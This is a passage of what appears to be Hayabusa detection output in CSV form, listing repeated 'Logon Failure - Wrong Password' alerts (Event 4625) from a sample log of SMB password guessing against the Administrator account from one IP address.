NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m00bI5welsLUWmwJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4shyxJk2PiH1TDlj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZyN2WO3UVY0WQs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSQjAMckifap5r1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qixqXiX0mVcuXe37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: gIfJCJz6l36WMeY9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZxv5U7uoN6E8c8E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mlIfE0N32OQeWuNw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkZcjpTmHcJ0uX38 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZfaHr2Yq6xkRjOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvy0EIiPSnom7pn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TN9PUb0BgI3u8Xax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xCgz5BNpQgLgW0Xi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: po2GBdrXr3XtBsWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O2rgo6jHcqu10IGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLblUOGzYzVA47E9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ysuA1xpYuAGRNONJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ksedziaGzXk5VNlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: irIfGLQdhtRRGwuo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YCf6WUjiS11hHqKT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1o0CTT7GsWfCWuHx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F6Jr8XrUsmTiSdol | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Buj66iuSkLEQdKnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L1wOLI51HqfkgO6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4oe273WXOICzkwW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1c7nGezYNJ70jR6R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajuZ09zGeuovCQLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4k7xV7soNF4mHlz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CtdqW8zOw1GoQcvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aY6FLi1edRZWrRZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ah1JoKfxJzQhCCVL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIMOZRGcv4o33BWd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmLyLJoVZz6fJ62I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGufqEGD4hFf2XLM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7IEdKy2H5Agblpjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XT9k8C05GVLBNPdl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5opHh8HelCXtR5Cm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0dntDwYLmag9efo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQfZOMFV9LtY7r2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: y01v38dTUIsJEZIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCP8x2QBZ6IvMEnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hgcbYjw3kKqlK7Di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TFU97Tq3e7IWvSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hUCvaS1yM2FU9AE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JInVlBqTSfT4J1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjXRQUGDKBZaMkw3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZPXNxkGOrld5eCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OBDhSrF7DZ1KBRa8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQ7TKJOGibAVNoCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZE1GARxx03m4FtEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gf3VLLTxsK85bsrv | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58G6MFVbW55JZIV5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yxne9LqZCqBf3qkc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ssZya6gArnuepKyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rsDEj6o0NaKUYPZL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pELSIsupIYAxPCtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: urHCDmdCfNexxUHf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czGXZFukLquA9Mce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: icWMY9pKCQMyTxJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v28FLC2WXEXSUiI5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FwhjHww5iA51SFjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 96BwmhKqDIojhdRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DiRvofjwoeAdHYrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNLdOrPwbvYELiCc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x15WKTspmg2ALHaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QMoQWddkcYtCmoKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jhTbfX42Pwn7OA2k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXcbUCgAhVFfqLc3 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GHyXVM0jpaKBiY9N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TZoWEcU6VbEnrLpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LIfEzNQWwvrai4ga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DhImfqWz7SHId9hE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6sekQfneNE5uFtx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
